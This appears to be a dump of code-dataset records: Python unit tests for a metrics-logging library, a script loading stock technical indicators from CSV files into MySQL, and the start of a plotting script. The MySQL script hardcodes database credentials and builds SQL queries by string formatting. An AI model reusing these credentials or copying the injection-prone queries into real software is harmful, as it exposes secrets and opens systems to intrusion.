= Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.HOURLY)\n metrics_hourly.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.HOURLY)))\n metrics_daily = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.DAILY)\n metrics_daily.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.DAILY)))\n\n def test_multiple_units(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope()\n scope.add_value(\"NanoSecond\", 1, Units.NANOSECOND)\n scope.add_value(\"MicroSecond\", 2, Units.MICROSECOND)\n scope.add_value(\"MilliSecond\", 3, Units.MILLISECOND)\n scope.add_value(\"Second\", 4, Units.SECOND)\n scope.add_value(\"Minute\", 5, Units.MINUTE)\n scope.add_value(\"Hour\", 6, Units.HOUR)\n scope.add_value(\"Byte\", 7, Units.BYTE)\n scope.add_value(\"KiloByte\", 8, Units.KILOBYTE)\n scope.add_value(\"MegaByte\", 9, Units.MEGABYTE)\n scope.add_value(\"GigaByte\", 10, Units.GIGABYTE)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual(\n \"Metrics=MilliSecond=3ms,Hour=6h,KiloByte=8kb,NanoSecond=1ns,GigaByte=10gb,Second=4s,MicroSecond=2us,Byte=7b,MegaByte=9mb,Minute=5m\\n\",\n log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_get_empty_scope(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope())\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_reset_after_flush(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(self.sample_timestamp)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n def test_scope_override_and_multiple_updates(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope1 = metrics.get_scope(\"method=GetAPI , host = 1.2.3.4\")\n scope1.add_counter(\"CountIt\", 1)\n scope2 = metrics.get_scope(\" host = 1.2.3.4 , methoD=GetAPI\")\n scope2.add_counter(\"CountIt\", 8)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=host=1.2.3.4,market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=CountIt=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_scope_override(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope = metrics.get_scope(\"method=GetAPI\")\n scope.add_counter(\"MyCounter\", 1)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=MyCounter=1\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_dimension_normalization(self):\n metrics = Metrics(self.log_path, \"maRket=Hanoi , SerViCe=MyTestProgram\")\n scope = metrics.get_scope(\"mEthod=PushAPI\")\n scope.add_counter(\"Success\", 9)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Success=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_counters_and_values(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope(\"method=PushAPI\")\n self.__add_counters(scope)\n self.__add_values(scope)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Failed=2,Pushes=11,NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def __get_logfile(self, timestamp=None, rotation=Rotations.HOURLY):\n now = datetime.datetime.now()\n if timestamp:\n now = datetime.datetime.fromtimestamp(timestamp)\n if rotation is Rotations.MINUTELY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H-%M\")\n if rotation is Rotations.HOURLY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H\")\n if rotation is Rotations.DAILY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d\")\n\n def __assert_emit_metrics(self, dimension1, dimension2, scope1, scope2):\n metrics1 = Metrics(self.log_path, dimension1)\n self.__add_values(metrics1.get_scope(scope1))\n metrics1.flush(self.sample_timestamp)\n metrics1.close()\n metrics2 = Metrics(self.log_path, dimension2)\n self.__add_counters(metrics2.get_scope(scope2))\n metrics2.flush(self.sample_timestamp)\n metrics2.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n @staticmethod\n def __add_counters(scope):\n scope.add_counter(\"Pushes\", 10)\n scope.add_counter(\"Pushes\", 1)\n scope.add_counter(\"Failed\", 1)\n scope.add_counter(\"Failed\", 1)\n\n @staticmethod\n def __add_values(scope):\n scope.add_value(\"Time\", 1200, Units.MILLISECOND)\n scope.add_value(\"Time\", 800, Units.MILLISECOND)\n scope.add_value(\"DBTime\", 10, Units.MILLISECOND)\n scope.add_value(\"NoUnit\", 999)\n scope.add_value(\"NoUnit\", 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "sub_path": "tests/test_haymetric.py", "file_name": "test_haymetric.py", "file_ext": "py", "file_size_in_byte": 11490, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.removedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 48, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 68, "usage_type": "call"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 68, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 68, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 70, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 70, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 71, "usage_type": "call"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 71, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 73, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 73, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 74, "usage_type": "call"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 74, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 74, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 76, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 76, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 79, "usage_type": "call"}, {"api_name": "haymetric.Units.NANOSECOND", "line_number": 81, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 81, "usage_type": "name"}, {"api_name": "haymetric.Units.MICROSECOND", "line_number": 82, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 82, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 83, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 83, "usage_type": "name"}, {"api_name": "haymetric.Units.SECOND", "line_number": 84, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 84, "usage_type": "name"}, {"api_name": "haymetric.Units.MINUTE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 85, "usage_type": "name"}, {"api_name": "haymetric.Units.HOUR", "line_number": 86, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 86, "usage_type": "name"}, {"api_name": "haymetric.Units.BYTE", "line_number": 87, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 87, "usage_type": "name"}, {"api_name": "haymetric.Units.KILOBYTE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 88, "usage_type": "name"}, {"api_name": "haymetric.Units.MEGABYTE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 89, "usage_type": "name"}, {"api_name": "haymetric.Units.GIGABYTE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 90, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 103, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 115, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 135, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 150, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 163, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 176, "usage_type": "call"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 189, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 189, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 193, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 193, "usage_type": "name"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 195, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 195, "usage_type": "name"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 197, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 197, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 201, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 205, "usage_type": "call"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 229, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 229, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 230, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 230, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 231, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 231, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 237, "usage_type": "call"}]} {"seq_id": "105105068", "text": "#coding=utf-8\r\n#!/home/pi/miniconda3/envs/py36/bin/python\r\n\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom sqlalchemy import create_engine\r\nimport mysql.connector\r\nimport re\r\nimport csv\r\nimport time\r\nimport shutil\r\nimport os\r\nimport io\r\nfrom pandas import isnull\r\nfrom glob import glob\r\n\r\n# ip = '182.155.205.224'\r\n\r\nip = '127.0.0.1'\r\n\r\n# engine = create_engine( \"mysql+mysqldb://root:28wC75#D@127.0.0.1/StockDB?charset=utf8\" )\r\n\r\nenginePi = create_engine( 'mysql+mysqlconnector://pregaine:RF69xy7C@{}/mysql?charset=utf8'.format( ip ) )\r\n\r\ndef StrToDateFormat( data, val ):\r\n # print( 'data {}, val {}'.format( data, val ) )\r\n \r\n dt = datetime.strptime( val, '%y%m%d' )\r\n val = dt.strftime( \"%y-%m-%d\" )\r\n\r\n return val\r\n\r\n\r\nclass DB_TechAnalysis:\r\n\r\n def __init__( self, server, database, username, password ):\r\n\r\n self.df = pd.DataFrame( )\r\n self.src_df = pd.DataFrame( )\r\n\r\n self.d = { '月': 'TECH_M' }\r\n\r\n self.datelst = [ ]\r\n print( \"Initial Database connection...\" + database )\r\n self.dbname = database\r\n \r\n self.con_db = mysql.connector.connect( host = server,\r\n user = username,\r\n passwd = password,\r\n database = database,\r\n charset = \"utf8\"\r\n )\r\n \r\n self.cur_db = self.con_db.cursor( buffered = True )\r\n self.con_db.commit( )\r\n\r\n # TODO 如何查當下SQL 語言及時間格式\r\n # cmd = \"\"\"SET LANGUAGE us_english; set dateformat ymd;\"\"\"\r\n # self.cur_db.execute( cmd )\r\n\r\n self.stock = ''\r\n self.date = ''\r\n\r\n def ResetTable( self, data ):\r\n\r\n d = dict( 分 = 'DROP TABLE IF EXISTS TECH_H', \r\n 日 = 'DROP TABLE IF EXISTS TECH_D',\r\n 周 = 'DROP TABLE IF EXISTS TECH_W', \r\n 月 = 'DROP TABLE IF EXISTS TECH_M' )\r\n\r\n # Do some setup\r\n self.cur_db.execute( d[ data ] )\r\n \r\n print( 'Successfully Deleter ' + data )\r\n\r\n def CreateTable( self, data ):\r\n\r\n \r\n sql_m_cmd = '''\r\n CREATE TABLE mysql.TECH_M \r\n (\r\n stock varchar( 10 ) COLLATE utf8_bin NOT NULL,\r\n date DATE NOT NULL,\r\n \r\n open_price decimal(10, 2) NULL,\r\n high_price decimal(10, 2) NULL,\r\n low_price decimal(10, 2) NULL,\r\n close_price decimal(10, 2) NULL,\r\n volume bigint NULL,\r\n \r\n ma3 decimal(10, 2) NULL,\r\n ma6 decimal(10, 2) NULL,\r\n ma12 decimal(10, 2) NULL,\r\n ma24 decimal(10, 2) NULL,\r\n ma36 decimal(10, 2) NULL,\r\n ma60 decimal(10, 2) NULL,\r\n ma120 decimal(10, 2) NULL,\r\n \r\n rsi2 decimal(10, 2) NULL,\r\n rsi5 decimal(10, 2) NULL,\r\n rsi10 decimal(10, 2) NULL,\r\n \r\n k9_3 decimal(10, 2) NULL,\r\n d9_3 decimal(10, 2) NULL,\r\n k3_2 decimal(10, 2) NULL,\r\n d3_3 decimal(10, 2) NULL,\r\n \r\n mfi4 decimal(10, 2) NULL,\r\n mfi6 decimal(10, 2) NULL,\r\n mfi14 decimal(10, 2) NULL,\r\n\r\n macd_dif_6 decimal(10, 2) NULL,\r\n dem_12 decimal(10, 2) NULL,\r\n osc_6_12_9 decimal(10, 2) NULL,\r\n\r\n macd_dif_12 decimal(10, 2) NULL,\r\n dem_26 decimal(10, 2) NULL,\r\n osc6_12_26_9 decimal(10, 2) NULL,\r\n\r\n willr9 decimal(10, 2) NULL,\r\n willr18 decimal(10, 2) NULL,\r\n willr42 decimal(10, 2) NULL,\r\n willr14 decimal(10, 2) NULL,\r\n willr24 decimal(10, 2) NULL,\r\n willr56 decimal(10, 2) NULL,\r\n willr72 decimal(10, 2) NULL,\r\n \r\n plus_di decimal(10, 2) NULL,\r\n minus_di decimal(10, 2) NULL,\r\n dx decimal(10, 2) NULL,\r\n adx decimal(10, 2) NULL,\r\n upperband decimal(10, 2) NULL,\r\n middleband decimal(10, 2) NULL,\r\n dnperband decimal(10, 2) NULL,\r\n bb decimal(10, 2) NULL,\r\n w20 decimal(10, 2) NULL,\r\n bias20 decimal(10, 2) NULL,\r\n bias60 decimal(10, 2) NULL,\r\n\r\n INDEX name ( stock, date ),\r\n INDEX idx_stock ( stock ),\r\n INDEX idx_date ( date )\r\n\r\n )\r\n '''\r\n\r\n table_d = { '月': sql_m_cmd }\r\n\r\n self.cur_db.execute( table_d[ data ] )\r\n \r\n print( 'Successfully Create 技術指標 ' + data )\r\n\r\n def CompareDB( self, data ):\r\n \r\n # print( table_name, stock_num )\r\n \r\n cmd = 'SELECT date, volume FROM {0} WHERE stock = \\'{1}\\''.format( self.d[ data ], self.stock )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchall( )\r\n \r\n lst = [ ]\r\n\r\n for val in ft:\r\n \r\n date = val[ 0 ].strftime( '%y%m%d' )\r\n\r\n volume = val[ 1 ]\r\n \r\n lst.append( ( date, volume ) )\r\n\r\n df = pd.DataFrame( lst, columns = [ '日期', '成交量_資料庫取出' ] )\r\n # print( df.head( 5 ) )\r\n left = pd.merge( self.df, df, on = [ '日期' ], how = 'left' )\r\n left = left[ left[ '成交量_資料庫取出' ] != left[ '成交量' ] ]\r\n del left[ '成交量_資料庫取出' ]\r\n \r\n self.df = left \r\n \r\n for index, row in self.df.iterrows( ):\r\n # print( self.stock, row[ '日期' ] )\r\n self.FindDuplicate( row[ '日期' ] )\r\n \r\n # print( data, '刪除重覆寫入' )\r\n # print( self.df )\r\n\r\n def ReadCSV( self, file ):\r\n \r\n self.df = pd.read_csv( file, \r\n sep = ',', \r\n encoding = 'utf8', \r\n false_values = 'NA', \r\n dtype = { '日期': str } )\r\n \r\n self.df = self.df.replace( [ np.inf, -np.inf ], np.nan ) \r\n \r\n # self.df = self.df[ : 20 ]\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = \"%y%m%d\" ) \r\n # print( self.df )\r\n\r\n def FindDuplicate( self, data ):\r\n\r\n # 尋找重覆資料\r\n cmd = 'SELECT stock, date from mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = '''DELETE FROM mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'''.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n\r\n '''\r\n # 尋找重覆資料\r\n # cmd = 'SELECT stock, date from mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = 'DELETE FROM mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n '''\r\n\r\n def WriteDB( self, data ):\r\n \r\n \r\n '''\r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n lst = self.df.values.tolist( )\r\n\r\n if len( lst ) == 0:\r\n # print( '資料庫比對CSV無新資料 {}'.format( self.stock ) )\r\n return\r\n \r\n columns = [ 'stock', 'date', 'open_price', 'high_price ', 'low_price', 'close_price', 'volume',\r\n 'ma4', 'ma12', 'ma24', 'ma48', 'ma96', 'ma144', 'ma240', 'ma480', 'rsi2', 'rsi3',\r\n 'rsi4', 'rsi5', 'rsi10', 'k9_3', 'd9_3', 'k3_2', 'd3_3', 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', 'willr9',\r\n 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72', 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n \r\n lenVal = len( columns )\r\n \r\n var_string = ','.join( [ '%s' ] * lenVal )\r\n \r\n for val in lst:\r\n \r\n val[ 0 ] = self.stock\r\n \r\n # print( val ) \r\n # exit()\r\n \r\n # dt = datetime.strptime( val[ 1 ], '%y%m%d' )\r\n # val[ 1 ] = dt.strftime( \"%y-%m-%d\" )\r\n \r\n query_string = 'INSERT INTO mysql.TECH_W VALUES ( {} );'.format( var_string )\r\n\r\n # print( query_string )\r\n # print( '取出{}'.format( val ) )\r\n \r\n self.cur_db.execute( query_string, val )\r\n \r\n print( '寫入資料庫 {} {}'.format( val[ 0 ], val[ 1 ] ) )\r\n \r\n ''' \r\n \r\n \r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n if self.df.empty:\r\n # print( '{:<7}exist DB'.format( self.stock ) )\r\n return\r\n\r\n del self.df[ 'Unnamed: 0' ]\r\n self.df.insert( 0, 'stock', self.stock )\r\n\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = '%y%m%d' )\r\n # self.df[ '日期' ] = self.df[ '日期' ].dt.strftime( \"%y-%m-%d\" )\r\n\r\n # print( self.df, self.d[ data ] )\r\n\r\n \r\n self.df.columns = [ 'stock', 'date', 'open_price', 'high_price', 'low_price', 'close_price', 'volume',\r\n 'ma3', 'ma6', 'ma12', 'ma24', 'ma36', 'ma60', 'ma120',\r\n 'rsi2', 'rsi5', 'rsi10', \r\n 'k9_3', 'd9_3', 'k3_2', 'd3_3', \r\n 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', \r\n 'willr9', 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72',\r\n 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n\r\n\r\n # Try to send it to the access database (and fail)\r\n self.df.to_sql( name = self.d[ data ], \r\n con = enginePi, \r\n index = False, \r\n if_exists = 'append', \r\n index_label = None )\r\n \r\n print( '寫入資料庫{0:>2}{1:>7} {2}'.format( data, self.stock, self.date ) )\r\n\r\ndef main( ):\r\n \r\n db_M = DB_TechAnalysis( ip, 'mysql', 'pregaine', 'RF69xy7C' )\r\n \r\n # 移除表格\r\n db_M.ResetTable( '月' )\r\n\r\n # 建立資料表\r\n db_M.CreateTable( '月' )\r\n \r\n stock_M = { '月': [ db_M, '_月線技術指標.csv' ] }\r\n\r\n path = '/home/pi/Downloads/技術指標/month/'\r\n\r\n # 讀取資料夾\r\n for file in glob( '{}*_月線技術指標.csv'.format( path ) ):\r\n \r\n if os.path.getsize( file ) == 0:\r\n continue\r\n \r\n num = file.split( '_' )[ 0 ]\r\n num = num.replace( path, '' )\r\n data = file[ -10:-9 ]\r\n\r\n # print( file )\r\n\r\n if data in stock_M.keys( ):\r\n \r\n Obj = stock_M[ data ][ 0 ]\r\n Obj.stock = num\r\n \r\n print( '讀取 {}'.format( file ) )\r\n print( '股號 {}'.format( num ) )\r\n \r\n print( data )\r\n \r\n # if num != '2887':\r\n # continue\r\n\r\n Obj.ReadCSV( file )\r\n Obj.CompareDB( data ) \r\n Obj.WriteDB( data )\r\n\r\n else:\r\n print( '讀取錯誤 {}'.format( data ) )\r\n \r\n # exit()\r\n \r\nif __name__ == '__main__':\r\n\r\n start_tmr = time.time( )\r\n main( )\r\n print( '{:04.1f}'.format( (time.time( ) - start_tmr) ) )\r\n", "sub_path": "寫入技術指標月.py", "file_name": "寫入技術指標月.py", "file_ext": "py", "file_size_in_byte": 12638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 49, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 49, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 49, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.notnull", "line_number": 299, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 349, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 384, "usage_type": "call"}, {"api_name": "time.time", "line_number": 386, "usage_type": "call"}]} {"seq_id": "360103892", "text": "#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport os\n\n\n# plotting constants\nPERCENTILE_CATEGORIES = [20, 50, 70, 90]\nCOLOR_CATEGORIES = [\"#000033\", \"#000099\", \"#0000ff\", \"#6666ff\"]\nPERCENTILE_TICKS = [0, 20, 40, 60, 80, 100]\nGRID_ALPHA = 0.2\nLINE_ALPHA = 0.1\nMARKER_ALPHA = 0.6\nTITLE_FONT = 16\nAXIS_FONT = 14\nMAIN_FONT = 12\nLABEL_FONT = 10\nMAIN_COLOR = 'k'\nSECONDARY_COLOR = \"r\"\nMAIN_LINEWIDTH = 1\nMARKER_SIZE = 2\nBAR_WIDTH = 0.85\nHISTOGRAM_BINS = 50\nPNG_DPI = 300\n\n\ndef initialize_plot_style():\n \"\"\"\n Set matplotlib visual style\n Returns: None\n\n \"\"\"\n matplotlib.style.use('ggplot')\n plt.rcParams['lines.linewidth'] = MAIN_LINEWIDTH\n plt.rcParams['axes.facecolor'] = 'w'\n plt.rcParams['xtick.color'] = MAIN_COLOR\n plt.rc('xtick', labelsize=LABEL_FONT)\n plt.rc('ytick', labelsize=LABEL_FONT)\n\n\ndef load_host_links(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n bacteria = cut[5]\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if adjusted_inter_vs_intra_ratio < 0.1:\n continue\n if virus not in data:\n data[virus] = list()\n data[virus].append(copy_count)\n return data\n\n\ndef load_validation(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with 